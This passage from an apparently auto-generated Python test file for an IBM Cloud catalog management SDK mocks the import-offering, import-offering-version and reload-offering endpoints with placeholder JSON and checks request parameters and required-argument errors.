[{"anyKey": "anyValue"}], "hidden": true}], "metadata": {"mapKey": {"anyKey": "anyValue"}}, "validation": {"validated": "2019-01-01T12:00:00.000Z", "requested": "2019-01-01T12:00:00.000Z", "state": "state", "last_operation": "last_operation", "target": {"mapKey": {"anyKey": "anyValue"}}}, "required_resources": [{"type": "mem", "value": {"anyKey": "anyValue"}}], "single_instance": false, "install": {"instructions": "instructions", "script": "script", "script_permission": "script_permission", "delete_script": "delete_script", "scope": "scope"}, "pre_install": [{"instructions": "instructions", "script": "script", "script_permission": "script_permission", "delete_script": "delete_script", "scope": "scope"}], "entitlement": {"provider_name": "provider_name", "provider_id": "provider_id", "product_id": "product_id", "part_numbers": ["part_numbers"], "image_repo_name": "image_repo_name"}, "licenses": [{"id": "id", "name": "name", "type": "type", "url": "url", "description": "description"}], "image_manifest_url": "image_manifest_url", "deprecated": true, "package_version": "package_version", "state": {"current": "current", "current_entered": "2019-01-01T12:00:00.000Z", "pending": "pending", "pending_requested": "2019-01-01T12:00:00.000Z", "previous": "previous"}, "version_locator": "version_locator", "console_url": "console_url", "long_description": "long_description", "whitelisted_accounts": ["whitelisted_accounts"]}], "plans": [{"id": "id", "label": "label", "name": "name", "short_description": "short_description", "long_description": "long_description", "metadata": {"mapKey": {"anyKey": "anyValue"}}, "tags": ["tags"], "additional_features": [{"title": "title", "description": "description"}], "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z", "deployments": [{"id": "id", "label": "label", "name": "name", "short_description": "short_description", "long_description": "long_description", "metadata": {"mapKey": {"anyKey": "anyValue"}}, "tags": ["tags"], "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z"}]}]}], "permit_request_ibm_public_publish": false, "ibm_publish_approved": true, "public_publish_approved": false, "public_original_crn": "public_original_crn", "publish_public_crn": "publish_public_crn", "portal_approval_record": "portal_approval_record", "portal_ui_url": "portal_ui_url", "catalog_id": "catalog_id", "catalog_name": "catalog_name", "metadata": {"mapKey": {"anyKey": "anyValue"}}, "disclaimer": "disclaimer", "hidden": true, "provider": "provider", "repo_info": {"token": "token", "type": "type"}}'
responses.add(responses.POST,
url,
body=mock_response,
content_type='application/json',
status=201)
# Set up parameter values
catalog_identifier = 'testString'
offering_id = 'testString'
# Pass in all but one required param and check for a ValueError
req_param_dict = {
"catalog_identifier": catalog_identifier,
"offering_id": offering_id,
}
for param in req_param_dict.keys():
req_copy = {key:val if key is not param else None for (key,val) in req_param_dict.items()}
with pytest.raises(ValueError):
_service.import_offering_version(**req_copy)
class TestImportOffering():
"""
Test Class for import_offering
"""
def preprocess_url(self, request_url: str):
"""
Preprocess the request URL to ensure the mock response will be found.
"""
if re.fullmatch('.*/+', request_url) is None:
return request_url
else:
return re.compile(request_url.rstrip('/') + '/+')
@responses.activate
def test_import_offering_all_params(self):
"""
import_offering()
"""
# Set up mock
url = self.preprocess_url(_base_url + '/catalogs/testString/import/offerings')
mock_response = '{"id": "id", "_rev": "rev", "url": "url", "crn": "crn", "label": "label", "name": "name", "offering_icon_url": "offering_icon_url", "offering_docs_url": "offering_docs_url", "offering_support_url": "offering_support_url", "tags": ["tags"], "keywords": ["keywords"], "rating": {"one_star_count": 14, "two_star_count": 14, "three_star_count": 16, "four_star_count": 15}, "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z", "short_description": "short_description", "long_description": "long_description", "features": [{"title": "title", "description": "description"}], "kinds": [{"id": "id", "format_kind": "format_kind", "target_kind": "target_kind", "metadata": {"mapKey": {"anyKey": "anyValue"}}, "install_description": "install_description", "tags": ["tags"], "additional_features": [{"title": "title", "description": "description"}], "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z", "versions": [{"id": "id", "_rev": "rev", "crn": "crn", "version": "version", "sha": "sha", "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z", "offering_id": "offering_id", "catalog_id": "catalog_id", "kind_id": "kind_id", "tags": ["tags"], "repo_url": "repo_url", "source_url": "source_url", "tgz_url": "tgz_url", "configuration": [{"key": "key", "type": "type", "default_value": {"anyKey": "anyValue"}, "value_constraint": "value_constraint", "description": "description", "required": true, "options": [{"anyKey": "anyValue"}], "hidden": true}], "metadata": {"mapKey": {"anyKey": "anyValue"}}, "validation": {"validated": "2019-01-01T12:00:00.000Z", "requested": "2019-01-01T12:00:00.000Z", "state": "state", "last_operation": "last_operation", "target": {"mapKey": {"anyKey": "anyValue"}}}, "required_resources": [{"type": "mem", "value": {"anyKey": "anyValue"}}], "single_instance": false, "install": {"instructions": "instructions", "script": "script", "script_permission": "script_permission", "delete_script": "delete_script", "scope": "scope"}, "pre_install": [{"instructions": "instructions", "script": "script", "script_permission": "script_permission", "delete_script": "delete_script", "scope": "scope"}], "entitlement": {"provider_name": "provider_name", "provider_id": "provider_id", "product_id": "product_id", "part_numbers": ["part_numbers"], "image_repo_name": "image_repo_name"}, "licenses": [{"id": "id", "name": "name", "type": "type", "url": "url", "description": "description"}], "image_manifest_url": "image_manifest_url", "deprecated": true, "package_version": "package_version", "state": {"current": "current", "current_entered": "2019-01-01T12:00:00.000Z", "pending": "pending", "pending_requested": "2019-01-01T12:00:00.000Z", "previous": "previous"}, "version_locator": "version_locator", "console_url": "console_url", "long_description": "long_description", "whitelisted_accounts": ["whitelisted_accounts"]}], "plans": [{"id": "id", "label": "label", "name": "name", "short_description": "short_description", "long_description": "long_description", "metadata": {"mapKey": {"anyKey": "anyValue"}}, "tags": ["tags"], "additional_features": [{"title": "title", "description": "description"}], "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z", "deployments": [{"id": "id", "label": "label", "name": "name", "short_description": "short_description", "long_description": "long_description", "metadata": {"mapKey": {"anyKey": "anyValue"}}, "tags": ["tags"], "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z"}]}]}], "permit_request_ibm_public_publish": false, "ibm_publish_approved": true, "public_publish_approved": false, "public_original_crn": "public_original_crn", "publish_public_crn": "publish_public_crn", "portal_approval_record": "portal_approval_record", "portal_ui_url": "portal_ui_url", "catalog_id": "catalog_id", "catalog_name": "catalog_name", "metadata": {"mapKey": {"anyKey": "anyValue"}}, "disclaimer": "disclaimer", "hidden": true, "provider": "provider", "repo_info": {"token": "token", "type": "type"}}'
responses.add(responses.POST,
url,
body=mock_response,
content_type='application/json',
status=201)
# Set up parameter values
catalog_identifier = 'testString'
tags = ['testString']
target_kinds = ['testString']
content = b'This is a mock byte array value.'
zipurl = 'testString'
offering_id = 'testString'
target_version = 'testString'
include_config = True
is_vsi = True
repo_type = 'testString'
x_auth_token = 'testString'
# Invoke method
response = _service.import_offering(
catalog_identifier,
tags=tags,
target_kinds=target_kinds,
content=content,
zipurl=zipurl,
offering_id=offering_id,
target_version=target_version,
include_config=include_config,
is_vsi=is_vsi,
repo_type=repo_type,
x_auth_token=x_auth_token,
headers={}
)
# Check for correct operation
assert len(responses.calls) == 1
assert response.status_code == 201
# Validate query params
query_string = responses.calls[0].request.url.split('?',1)[1]
query_string = urllib.parse.unquote_plus(query_string)
assert 'zipurl={}'.format(zipurl) in query_string
assert 'offeringID={}'.format(offering_id) in query_string
assert 'targetVersion={}'.format(target_version) in query_string
assert 'includeConfig={}'.format('true' if include_config else 'false') in query_string
assert 'isVSI={}'.format('true' if is_vsi else 'false') in query_string
assert 'repoType={}'.format(repo_type) in query_string
# Validate body params
req_body = json.loads(str(responses.calls[0].request.body, 'utf-8'))
assert req_body['tags'] == ['testString']
assert req_body['target_kinds'] == ['testString']
assert req_body['content'] == 'VGhpcyBpcyBhIG1vY2sgYnl0ZSBhcnJheSB2YWx1ZS4='
@responses.activate
def test_import_offering_required_params(self):
"""
test_import_offering_required_params()
"""
# Set up mock
url = self.preprocess_url(_base_url + '/catalogs/testString/import/offerings')
mock_response = '{"id": "id", "_rev": "rev", "url": "url", "crn": "crn", "label": "label", "name": "name", "offering_icon_url": "offering_icon_url", "offering_docs_url": "offering_docs_url", "offering_support_url": "offering_support_url", "tags": ["tags"], "keywords": ["keywords"], "rating": {"one_star_count": 14, "two_star_count": 14, "three_star_count": 16, "four_star_count": 15}, "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z", "short_description": "short_description", "long_description": "long_description", "features": [{"title": "title", "description": "description"}], "kinds": [{"id": "id", "format_kind": "format_kind", "target_kind": "target_kind", "metadata": {"mapKey": {"anyKey": "anyValue"}}, "install_description": "install_description", "tags": ["tags"], "additional_features": [{"title": "title", "description": "description"}], "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z", "versions": [{"id": "id", "_rev": "rev", "crn": "crn", "version": "version", "sha": "sha", "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z", "offering_id": "offering_id", "catalog_id": "catalog_id", "kind_id": "kind_id", "tags": ["tags"], "repo_url": "repo_url", "source_url": "source_url", "tgz_url": "tgz_url", "configuration": [{"key": "key", "type": "type", "default_value": {"anyKey": "anyValue"}, "value_constraint": "value_constraint", "description": "description", "required": true, "options": [{"anyKey": "anyValue"}], "hidden": true}], "metadata": {"mapKey": {"anyKey": "anyValue"}}, "validation": {"validated": "2019-01-01T12:00:00.000Z", "requested": "2019-01-01T12:00:00.000Z", "state": "state", "last_operation": "last_operation", "target": {"mapKey": {"anyKey": "anyValue"}}}, "required_resources": [{"type": "mem", "value": {"anyKey": "anyValue"}}], "single_instance": false, "install": {"instructions": "instructions", "script": "script", "script_permission": "script_permission", "delete_script": "delete_script", "scope": "scope"}, "pre_install": [{"instructions": "instructions", "script": "script", "script_permission": "script_permission", "delete_script": "delete_script", "scope": "scope"}], "entitlement": {"provider_name": "provider_name", "provider_id": "provider_id", "product_id": "product_id", "part_numbers": ["part_numbers"], "image_repo_name": "image_repo_name"}, "licenses": [{"id": "id", "name": "name", "type": "type", "url": "url", "description": "description"}], "image_manifest_url": "image_manifest_url", "deprecated": true, "package_version": "package_version", "state": {"current": "current", "current_entered": "2019-01-01T12:00:00.000Z", "pending": "pending", "pending_requested": "2019-01-01T12:00:00.000Z", "previous": "previous"}, "version_locator": "version_locator", "console_url": "console_url", "long_description": "long_description", "whitelisted_accounts": ["whitelisted_accounts"]}], "plans": [{"id": "id", "label": "label", "name": "name", "short_description": "short_description", "long_description": "long_description", "metadata": {"mapKey": {"anyKey": "anyValue"}}, "tags": ["tags"], "additional_features": [{"title": "title", "description": "description"}], "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z", "deployments": [{"id": "id", "label": "label", "name": "name", "short_description": "short_description", "long_description": "long_description", "metadata": {"mapKey": {"anyKey": "anyValue"}}, "tags": ["tags"], "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z"}]}]}], "permit_request_ibm_public_publish": false, "ibm_publish_approved": true, "public_publish_approved": false, "public_original_crn": "public_original_crn", "publish_public_crn": "publish_public_crn", "portal_approval_record": "portal_approval_record", "portal_ui_url": "portal_ui_url", "catalog_id": "catalog_id", "catalog_name": "catalog_name", "metadata": {"mapKey": {"anyKey": "anyValue"}}, "disclaimer": "disclaimer", "hidden": true, "provider": "provider", "repo_info": {"token": "token", "type": "type"}}'
responses.add(responses.POST,
url,
body=mock_response,
content_type='application/json',
status=201)
# Set up parameter values
catalog_identifier = 'testString'
# Invoke method
response = _service.import_offering(
catalog_identifier,
headers={}
)
# Check for correct operation
assert len(responses.calls) == 1
assert response.status_code == 201
@responses.activate
def test_import_offering_value_error(self):
"""
test_import_offering_value_error()
"""
# Set up mock
url = self.preprocess_url(_base_url + '/catalogs/testString/import/offerings')
mock_response = '{"id": "id", "_rev": "rev", "url": "url", "crn": "crn", "label": "label", "name": "name", "offering_icon_url": "offering_icon_url", "offering_docs_url": "offering_docs_url", "offering_support_url": "offering_support_url", "tags": ["tags"], "keywords": ["keywords"], "rating": {"one_star_count": 14, "two_star_count": 14, "three_star_count": 16, "four_star_count": 15}, "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z", "short_description": "short_description", "long_description": "long_description", "features": [{"title": "title", "description": "description"}], "kinds": [{"id": "id", "format_kind": "format_kind", "target_kind": "target_kind", "metadata": {"mapKey": {"anyKey": "anyValue"}}, "install_description": "install_description", "tags": ["tags"], "additional_features": [{"title": "title", "description": "description"}], "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z", "versions": [{"id": "id", "_rev": "rev", "crn": "crn", "version": "version", "sha": "sha", "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z", "offering_id": "offering_id", "catalog_id": "catalog_id", "kind_id": "kind_id", "tags": ["tags"], "repo_url": "repo_url", "source_url": "source_url", "tgz_url": "tgz_url", "configuration": [{"key": "key", "type": "type", "default_value": {"anyKey": "anyValue"}, "value_constraint": "value_constraint", "description": "description", "required": true, "options": [{"anyKey": "anyValue"}], "hidden": true}], "metadata": {"mapKey": {"anyKey": "anyValue"}}, "validation": {"validated": "2019-01-01T12:00:00.000Z", "requested": "2019-01-01T12:00:00.000Z", "state": "state", "last_operation": "last_operation", "target": {"mapKey": {"anyKey": "anyValue"}}}, "required_resources": [{"type": "mem", "value": {"anyKey": "anyValue"}}], "single_instance": false, "install": {"instructions": "instructions", "script": "script", "script_permission": "script_permission", "delete_script": "delete_script", "scope": "scope"}, "pre_install": [{"instructions": "instructions", "script": "script", "script_permission": "script_permission", "delete_script": "delete_script", "scope": "scope"}], "entitlement": {"provider_name": "provider_name", "provider_id": "provider_id", "product_id": "product_id", "part_numbers": ["part_numbers"], "image_repo_name": "image_repo_name"}, "licenses": [{"id": "id", "name": "name", "type": "type", "url": "url", "description": "description"}], "image_manifest_url": "image_manifest_url", "deprecated": true, "package_version": "package_version", "state": {"current": "current", "current_entered": "2019-01-01T12:00:00.000Z", "pending": "pending", "pending_requested": "2019-01-01T12:00:00.000Z", "previous": "previous"}, "version_locator": "version_locator", "console_url": "console_url", "long_description": "long_description", "whitelisted_accounts": ["whitelisted_accounts"]}], "plans": [{"id": "id", "label": "label", "name": "name", "short_description": "short_description", "long_description": "long_description", "metadata": {"mapKey": {"anyKey": "anyValue"}}, "tags": ["tags"], "additional_features": [{"title": "title", "description": "description"}], "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z", "deployments": [{"id": "id", "label": "label", "name": "name", "short_description": "short_description", "long_description": "long_description", "metadata": {"mapKey": {"anyKey": "anyValue"}}, "tags": ["tags"], "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z"}]}]}], "permit_request_ibm_public_publish": false, "ibm_publish_approved": true, "public_publish_approved": false, "public_original_crn": "public_original_crn", "publish_public_crn": "publish_public_crn", "portal_approval_record": "portal_approval_record", "portal_ui_url": "portal_ui_url", "catalog_id": "catalog_id", "catalog_name": "catalog_name", "metadata": {"mapKey": {"anyKey": "anyValue"}}, "disclaimer": "disclaimer", "hidden": true, "provider": "provider", "repo_info": {"token": "token", "type": "type"}}'
responses.add(responses.POST,
url,
body=mock_response,
content_type='application/json',
status=201)
# Set up parameter values
catalog_identifier = 'testString'
# Pass in all but one required param and check for a ValueError
req_param_dict = {
"catalog_identifier": catalog_identifier,
}
for param in req_param_dict.keys():
req_copy = {key:val if key is not param else None for (key,val) in req_param_dict.items()}
with pytest.raises(ValueError):
_service.import_offering(**req_copy)
class TestReloadOffering():
"""
Test Class for reload_offering
"""
def preprocess_url(self, request_url: str):
"""
Preprocess the request URL to ensure the mock response will be found.
"""
if re.fullmatch('.*/+', request_url) is None:
return request_url
else:
return re.compile(request_url.rstrip('/') + '/+')
@responses.activate
def test_reload_offering_all_params(self):
"""
reload_offering()
"""
# Set up mock
url = self.preprocess_url(_base_url + '/catalogs/testString/offerings/testString/reload')
mock_response = '{"id": "id", "_rev": "rev", "url": "url", "crn": "crn", "label": "label", "name": "name", "offering_icon_url": "offering_icon_url", "offering_docs_url": "offering_docs_url", "offering_support_url": "offering_support_url", "tags": ["tags"], "keywords": ["keywords"], "rating": {"one_star_count": 14, "two_star_count": 14, "three_star_count": 16, "four_star_count": 15}, "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z", "short_description": "short_description", "long_description": "long_description", "features": [{"title": "title", "description": "description"}], "kinds": [{"id": "id", "format_kind": "format_kind", "target_kind": "target_kind", "metadata": {"mapKey": {"anyKey": "anyValue"}}, "install_description": "install_description", "tags": ["tags"], "additional_features": [{"title": "title", "description": "description"}], "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z", "versions": [{"id": "id", "_rev": "rev", "crn": "crn", "version": "version", "sha": "sha", "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z", "offering_id": "offering_id", "catalog_id": "catalog_id", "kind_id": "kind_id", "tags": ["tags"], "repo_url": "repo_url", "source_url": "source_url", "tgz_url": "tgz_url", "configuration": [{"key": "key", "type": "type", "default_value": {"anyKey": "anyValue"}, "value_constraint": "value_constraint", "description": "description", "required": true, "options": [{"anyKey": "anyValue"}], "hidden": true}], "metadata": {"mapKey": {"anyKey": "anyValue"}}, "validation": {"validated": "2019-01-01T12:00:00.000Z", "requested": "2019-01-01T12:00:00.000Z", "state": "state", "last_operation": "last_operation", "target": {"mapKey": {"anyKey": "anyValue"}}}, "required_resources": [{"type": "mem", "value": {"anyKey": "anyValue"}}], "single_instance": false, "install": {"instructions": "instructions", "script": "script", "script_permission": "script_permission", "delete_script": "delete_script", "scope": "scope"}, "pre_install": [{"instructions": "instructions", "script": "script", "script_permission": "script_permission", "delete_script": "delete_script", "scope": "scope"}], "entitlement": {"provider_name": "provider_name", "provider_id": "provider_id", "product_id": "product_id", "part_numbers": ["part_numbers"], "image_repo_name": "image_repo_name"}, "licenses": [{"id": "id", "name": "name", "type": "type", "url": "url", "description": "description"}], "image_manifest_url": "image_manifest_url", "deprecated": true, "package_version": "package_version", "state": {"current": "current", "current_entered": "2019-01-01T12:00:00.000Z", "pending": "pending", "pending_requested": "2019-01-01T12:00:00.000Z", "previous": "previous"}, "version_locator": "version_locator", "console_url": "console_url", "long_description": "long_description", "whitelisted_accounts": ["whitelisted_accounts"]}], "plans": [{"id": "id", "label": "label", "name": "name", "short_description": "short_description", "long_description": "long_description", "metadata": {"mapKey": {"anyKey": "anyValue"}}, "tags": ["tags"], "additional_features": [{"title": "title", "description": "description"}], "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z", "deployments": [{"id": "id", "label": "label", "name": "name", "short_description": "short_description", "long_description": "long_description", "metadata": {"mapKey": {"anyKey": "anyValue"}}, "tags": ["tags"], "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z"}]}]}], "permit_request_ibm_public_publish": false, "ibm_publish_approved": true, "public_publish_approved": false, "public_original_crn": "public_original_crn", "publish_public_crn": "publish_public_crn", "portal_approval_record": "portal_approval_record", "portal_ui_url": "portal_ui_url", "catalog_id": "catalog_id", "catalog_name": "catalog_name", "metadata": {"mapKey": {"anyKey": "anyValue"}}, "disclaimer": "disclaimer", "hidden": true, "provider": "provider", "repo_info": {"token": "token", "type": "type"}}'
responses.add(responses.PUT,
url,
body=mock_response,
content_type='application/json',
status=201)
# Set up parameter values
catalog_identifier = 'testString'
offering_id = 'testString'
target_version = 'testString'
tags = ['testString']
target_kinds = ['testString']
content = b'This is a mock byte array value.'
zipurl = 'testString'
repo_type = 'testString'
# Invoke method
response = _service.reload_offering(
catalog_identifier,
offering_id,
target_version,
tags=tags,
target_kinds=target_kinds,
content=content,
zipurl=zipurl,
repo_type=repo_type,
headers={}
)
# Check for correct operation
assert len(responses.calls) == 1
assert response.status_code == 201
# Validate query params
query_string = responses.calls[0].request.url.split('?',1)[1]
query_string = urllib.parse.unquote_plus(query_string)
assert 'targetVersion={}'.format(target_version) in query_string
assert 'zipurl={}'.format(zipurl) in query_string
assert 'repoType={}'.format(repo_type) in query_string
# Validate body params
req_body = json.loads(str(responses.calls[0].request.body, 'utf-8'))
assert req_body['tags'] == ['testString']
assert req_body['target_kinds'] == ['testString']
assert req_body['content'] == 'VGhpcyBpcyBhIG1vY2sgYnl0ZSBhcnJheSB2YWx1ZS4='
@responses.activate
def test_reload_offering_required_params(self):
"""
test_reload_offering_required_params()
"""
# Set up mock
url = self.preprocess_url(_base_url + '/catalogs/testString/offerings/testString/reload')
mock_response = '{"id": "id", "_rev": "rev", "url": "url", "crn": "crn", "label": "label", "name": "name", "offering_icon_url": "offering_icon_url", "offering_docs_url": "offering_docs_url", "offering_support_url": "offering_support_url", "tags": ["tags"], "keywords": ["keywords"], "rating": {"one_star_count": 14, "two_star_count": 14, "three_star_count": 16, "four_star_count": 15}, "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z", "short_description": "short_description", "long_description": "long_description", "features": [{"title": "title", "description": "description"}], "kinds": [{"id": "id", "format_kind": "format_kind", "target_kind": "target_kind", "metadata": {"mapKey": {"anyKey": "anyValue"}}, "install_description": "install_description", "tags": ["tags"], "additional_features": [{"title": "title", "description": "description"}], "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z", "versions": [{"id": "id", "_rev": "rev", "crn": "crn", "version": "version", "sha": "sha", "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z", "offering_id": "offering_id", "catalog_id": "catalog_id", "kind_id": "kind_id", "tags": ["tags"], "repo_url": "repo_url", "source_url": "source_url", "tgz_url": "tgz_url", "configuration": [{"key": "key", "type": "type", "default_value": {"anyKey": "anyValue"}, "value_constraint": "value_constraint", "description": "description", "required": true, "options": [{"anyKey": "anyValue"}], "hidden": true}], "metadata": {"mapKey": {"anyKey": "anyValue"}}, "validation": {"validated": "2019-01-01T12:00:00.000Z", "requested": "2019-01-01T12:00:00.000Z", "state": "state", "last_operation": "last_operation", "target": {"mapKey": {"anyKey": "anyValue"}}}, "required_resources": [{"type": "mem", "value": {"anyKey": "anyValue"}}], "single_instance": false, "install": {"instructions": "instructions", "script": "script", "script_permission": "script_permission", "delete_script": "delete_script", "scope": "scope"}, "pre_install": [{"instructions": "instructions", "script": "script", "script_permission": "script_permission", "delete_script": "delete_script", "scope": "scope"}], "entitlement": {"provider_name": "provider_name", "provider_id": "provider_id", "product_id": "product_id", "part_numbers": ["part_numbers"], "image_repo_name": "image_repo_name"}, "licenses": [{"id": "id", "name": "name", "type": "type", "url": "url", "description": "description"}], "image_manifest_url": "image_manifest_url", "deprecated": true, "package_version": "package_version", "state": {"current": "current", "current_entered": "2019-01-01T12:00:00.000Z", "pending": "pending", "pending_requested": "2019-01-01T12:00:00.000Z", "previous": "previous"}, "version_locator": "version_locator", "console_url": "console_url", "long_description": "long_description", "whitelisted_accounts": ["whitelisted_accounts"]}], "plans": [{"id": "id", "label": "label", "name": "name", "short_description": "short_description", "long_description": "long_description", "metadata": {"mapKey": {"anyKey": "anyValue"}}, "tags": ["tags"], "additional_features": [{"title": "title", "description": "description"}], "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z", "deployments": [{"id": "id", "label": "label", "name": "name", "short_description": "short_description", "long_description": "long_description", "metadata": {"mapKey": {"anyKey": "anyValue"}}, "tags": ["tags"], "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z"}]}]}], "permit_request_ibm_public_publish": false, "ibm_publish_approved": true, "public_publish_approved": false, "public_original_crn": "public_original_crn", "publish_public_crn": "publish_public_crn", "portal_approval_record": "portal_approval_record", "portal_ui_url": "portal_ui_url", "catalog_id": "catalog_id", "catalog_name": "catalog_name", "metadata": {"mapKey": {"anyKey": "anyValue"}}, "disclaimer": "disclaimer", "hidden": true, "provider": "provider", "repo_info": {"token": "token", "type": "type"}}'
responses.add(responses.PUT,
url,
body=mock_response,
content_type='application/json',
status=201)
# Set up parameter values
catalog_identifier = 'testString'
offering_id = 'testString'
target_version = 'testString'
# Invoke method
response = _service.reload_offering(
catalog_identifier,
offering_id,
target_version,
headers={}
)
# Check for correct operation
assert len(responses.calls) == 1
assert response.status_code == 201
# Validate query params
query_string = responses.calls[0].request.url.split('?',1)[1]
query_string = urllib.parse.unquote_plus(query_string)
assert 'targetVersion={}'.format(target_version) in query_string
@responses.activate
def test_reload_offering_value_error(self):
"""
test_reload_offering_value_error()
"""
# Set up mock
url = self.preprocess_url(_base_url + '/catalogs/testString/offerings/testString/reload')
mock_response = '{"id": "id", "_rev": "rev", "url": "url", "crn": "crn", "label": "label", "name": "name", "offering_icon_url": "offering_icon_url", "offering_docs_url": "offering_docs_url", "offering_support_url": "offering_support_url", "tags": ["tags"], "keywords": ["keywords"], "rating": {"one_star_count": 14, "two_star_count": 14, "three_star_count": 16, "four_star_count": 15}, "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z", "short_description": "short_description", "long_description": "long_description", "features": [{"title": "title", "description": "description"}], "kinds": [{"id": "id", "format_kind": "format_kind", "target_kind": "target_kind", "metadata": {"mapKey": {"anyKey": "anyValue"}}, "install_description": "install_description", "tags": ["tags"], "additional_features": [{"title": "title", "description": "description"}], "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z", "versions": [{"id": "id", "_rev": "rev", "crn": "crn", "version": "version", "sha": "sha", "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z", "offering_id": "offering_id", "catalog_id": "catalog_id", "kind_id": "kind_id", "tags": ["tags"], "repo_url": "repo_url", "source_url": "source_url", "tgz_url": "tgz_url", "configuration": [{"key": "key", "type": "type", "default_value": {"anyKey": "anyValue"}, "value_constraint": "value_constraint", "description": "description", "required": true, "options": [{"anyKey": "anyValue"}], "hidden": true}], "metadata": {"mapKey": {"anyKey": "anyValue"}}, "validation": {"validated": "2019-01-01T12:00:00.000Z", "requested": "2019-01-01T12:00:00.000Z", "state": "state", "last_operation": "last_operation", "target": {"mapKey": {"anyKey": "anyValue"}}}, "required_resources": [{"type": "mem", "value": {"anyKey": "anyValue"}}], "single_instance": false, "install": {"instructions": "instructions", "script": "script", "script_permission": "script_permission", "delete_script": "delete_script", "scope": "scope"}, "pre_install": [{"instructions": "instructions", "script": "script", "script_permission": "script_permission", "delete_script": "delete_script", "scope": "scope"}], "entitlement": {"provider_name": "provider_name", "provider_id": "provider_id", "product_id": "product_id", "part_numbers": ["part_numbers"], "image_repo_name": "image_repo_name"}, "licenses": [{"id": "id", "name": "name", "type": "type", "url": "url", "description": "description"}], "image_manifest_url": "image_manifest_url", "deprecated": true, "package_version": "package_version", "state": {"current": "current", "current_entered": "2019-01-01T12:00:00.000Z", "pending": "pending", "pending_requested": "2019-01-01T12:00:00.000Z", "previous": "previous"}, "version_locator": "version_locator", "console_url": "console_url", "long_description": "long_description", "whitelisted_accounts": ["whitelisted_accounts"]}], "plans": [{"id": "id", "label": "label", "name": "name", "short_description": "short_description", "long_description": "long_description", "metadata": {"mapKey": {"anyKey": "anyValue"}}, "tags": ["tags"], "additional_features": [{"title": "title", "description": "description"}], "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z", "deployments": [{"id": "id", "label": "label", "name": "name", "short_description": "short_description", "long_description": "long_description", "metadata": {"mapKey": {"anyKey": "anyValue"}}, "tags": ["tags"], "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z"}]}]}], "permit_request_ibm_public_publish": false, "ibm_publish_approved": true, "public_publish_approved": false, "public_original_crn": "public_original_crn", "publish_public_crn": "publish_public_crn", "portal_approval_record": "portal_approval_record", "portal_ui_url": "portal_ui_url", "catalog_id": "catalog_id", "catalog_name": "catalog_name", "metadata": {"mapKey": {"anyKey": "anyValue"}}, "disclaimer": "disclaimer", "hidden": true, "provider": "provider", "repo_info": {"token": "token", "type": "type"}}'
responses.add(responses.PUT,
url,
body=mock_response,
content_type='application/json',
status=201)
# Set up parameter values
catalog_identifier = 'testString'
offering_id = 'testString'
target_version = 'testString'
# Pass in all but one required param and check for a ValueError
req_param_dict = {
"catalog_identifier": catalog_identifier,
"offering_id": offering_id,
"target_version": target_version,
}
for param in req_param_dict.keys():
req_copy = {key:val if key is not param else None for (key,val) in req_param_dict.items()}
with pytest.raises(ValueError):
_service.reload_offering(**req_copy)
class TestGetOffering():
"""
Test Class for get_offering
"""
def preprocess_url(self, request_url: str):
"""
Preprocess the request URL to ensure the mock response will be found.
"""
if re.fullmatch('.*/+', request_url) is None:
return request_url
else:
return re.compile(request_url.rstrip('/') + '/+')
@responses.activate
def test_get_offering_all_params(self):
"""
get_offering()
"""
# Set up mock
url = self.preprocess_url(_base_url + '/catalogs/testString/offerings/testString')
